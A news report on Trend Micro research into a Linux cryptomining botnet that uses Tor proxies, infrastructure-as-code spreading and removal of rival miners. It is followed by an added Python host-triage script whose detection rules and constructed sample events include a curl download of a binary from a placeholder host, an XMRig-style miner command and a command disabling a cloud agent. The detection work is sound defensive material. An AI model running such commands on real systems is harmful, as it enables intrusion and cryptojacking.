According to new research from anti-malware vendor Trend Micro, a recently discovered malware botnet targeting Linux systems employs several techniques that are gaining ground among cyber-criminals, such as the use of Tor proxies, legitimate DevOps software, and the removal of competing malware.
According to the researchers, the malware can download every file it requires from the Tor anonymity network, including post-infection scripts and legitimate, necessary binaries such as ss, ps, and curl that may be missing from the target environment.
The malware may use these tools to send HTTP requests, collect information about the infected device, and even run processes.
The threat actor behind the botnet operates a large network of proxies to establish links between the surface web and the Tor network in order to carry out the attacks.
Apart from relaying requests, these proxies often pass along information about the victim systems, such as IP addresses, architecture, usernames, and a portion of the uniform resource identifier (URI), which is used to determine which architecture-dependent binary to download.
The abused proxy servers have insecure open services, implying that they were exploited without the server owners' knowledge. Trend Micro's researchers noted that, during their investigation, the proxy service was disabled after a while.
The Linux malware is designed to operate on a wide range of device architectures, with the initial script performing a series of checks on the target before downloading additional files and continuing the infection process.
As a result, Trend Micro suspects the threat actor behind the botnet is preparing to begin a larger campaign aimed at Linux systems.
The malware sample discovered can disable cloud-related resources and agents, as well as spread to other systems using infrastructure-as-code (IaC) tools like Ansible, Chef, and SaltStack.
Currently, the botnet installs the XMRig Monero (XMR) miner on compromised machines. The crypto-miner uses its own mining pool, and the malware searches for other running miners and tries to remove them.
“No other software is needed for this malware sample to run and spread; the Linux operating system is the only requirement. Since not every environment targeted for infection has them, and it’s possible that the consumer doesn’t have the requisite permissions to install them on the device (as in the case of containers), it installs the essential tools (ss, ps, curl),” Trend Micro added.
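The behaviours reported above (tools such as ss, ps and curl staged by the malware itself, architecture-specific binaries fetched through proxies, IaC tooling used for spreading, cloud agents disabled, and a competing-miner cleanup around XMRig) each leave a trace in host process telemetry. The following triage script is an added defensive example, not Trend Micro's code and not part of the malware; the process records are constructed, and the trusted-path list, the allowed IaC uids, the "agent" naming pattern and the miner command-line markers are assumptions chosen for illustration, not indicators published with the research.

```python
"""Host-triage rules for the Linux botnet behaviours described in the article.

Added defensive example (not Trend Micro's code). All events below are
constructed; path lists, uid allow-list and miner markers are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-start event as a host agent (auditd, eBPF, EDR) might report it."""
    pid: int
    exe: str          # resolved path of the executable
    cmdline: str      # full command line
    uid: int          # effective uid of the process
    parent_exe: str   # resolved path of the parent's executable


# Directories from which ss, ps and curl are normally run (assumption: typical distro layout).
TRUSTED_BIN_DIRS = ("/bin/", "/usr/bin/", "/sbin/", "/usr/sbin/", "/usr/local/bin/")
# Tools the article says the malware fetches itself when they are absent.
STAGED_TOOLS = {"ss", "ps", "curl"}
# Architecture tokens a download URI may carry to select a binary (assumption).
ARCH_TOKENS = re.compile(r"(x86_64|amd64|i[3-6]86|aarch64|armv[5-8]|mips(el)?)", re.I)
# Infrastructure-as-code tools named in the article (CLI names are assumptions).
IAC_TOOLS = {"ansible", "ansible-playbook", "salt", "salt-call", "chef-client", "knife"}
# uids expected to drive IaC tooling on this host (assumption: root and one deploy user).
IAC_ALLOWED_UIDS = {0, 1001}
# Stopping/disabling a unit whose name contains "agent" (assumption about agent naming).
STOP_AGENT = re.compile(r"\bsystemctl\s+(stop|disable)\b.*agent", re.I)
# Common XMRig command-line markers (assumption; the article names only the miner itself).
MINER_MARKERS = ("xmrig", "stratum+tcp://", "--donate-level")


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def check_staged_tool(ev: ProcEvent):
    """ss/ps/curl running from outside the package-managed directories."""
    name = basename(ev.exe)
    if name in STAGED_TOOLS and not ev.exe.startswith(TRUSTED_BIN_DIRS):
        return f"{name} executed from non-standard path {ev.exe}"


def check_arch_download(ev: ProcEvent):
    """curl/wget fetching a URL whose path selects an architecture-specific binary."""
    if basename(ev.exe) in ("curl", "wget"):
        url = re.search(r"https?://\S+", ev.cmdline)
        if url and ARCH_TOKENS.search(url.group(0)):
            return f"architecture-specific download: {url.group(0)}"


def check_miner(ev: ProcEvent):
    """Cryptominer indicators in the executable name or command line."""
    low = ev.cmdline.lower()
    if basename(ev.exe) == "xmrig" or any(m in low for m in MINER_MARKERS):
        return "cryptominer indicators in command line"


def check_iac_abuse(ev: ProcEvent):
    """IaC tooling driven by an account that is not expected to run it."""
    if basename(ev.exe) in IAC_TOOLS and ev.uid not in IAC_ALLOWED_UIDS:
        return f"IaC tool {basename(ev.exe)} run by unexpected uid {ev.uid}"


def check_agent_disable(ev: ProcEvent):
    """A monitoring/cloud agent being stopped or disabled."""
    if STOP_AGENT.search(ev.cmdline):
        return "agent service stopped or disabled: " + ev.cmdline


RULES = [check_staged_tool, check_arch_download, check_miner, check_iac_abuse, check_agent_disable]


def triage(events):
    """Run every rule over every event; return (pid, rule name, message) findings."""
    findings = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                findings.append((ev.pid, rule.__name__, msg))
    return findings


# Constructed sample telemetry: one benign baseline event, then events shaped like the reported behaviours.
SAMPLE_EVENTS = [
    ProcEvent(101, "/usr/bin/ps", "ps aux", 1000, "/bin/bash"),
    ProcEvent(102, "/tmp/.x/curl", "/tmp/.x/curl -s http://proxy.invalid/dl/x86_64/bin -o /tmp/.x/bin", 1000, "/bin/sh"),
    ProcEvent(103, "/tmp/.x/bin", "/tmp/.x/bin -o stratum+tcp://pool.invalid:3333 --donate-level 0", 1000, "/bin/sh"),
    ProcEvent(104, "/usr/bin/ansible-playbook", "ansible-playbook -i hosts spread.yml", 1000, "/bin/sh"),
    ProcEvent(105, "/bin/systemctl", "systemctl disable example-cloud-agent", 0, "/bin/sh"),
    ProcEvent(106, "/usr/bin/ansible-playbook", "ansible-playbook site.yml", 1001, "/bin/bash"),
]

if __name__ == "__main__":
    for pid, rule, msg in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: [{rule}] {msg}")
```

Each rule is deliberately narrow and returns a message rather than a verdict, so the findings can be correlated on a host: a curl binary in /tmp fetching an architecture-named path, followed by a process with miner markers and an IaC tool run by the same non-deploy uid, is a much stronger signal together than any one rule alone. The allow-lists are the part to tune per environment before trusting the output.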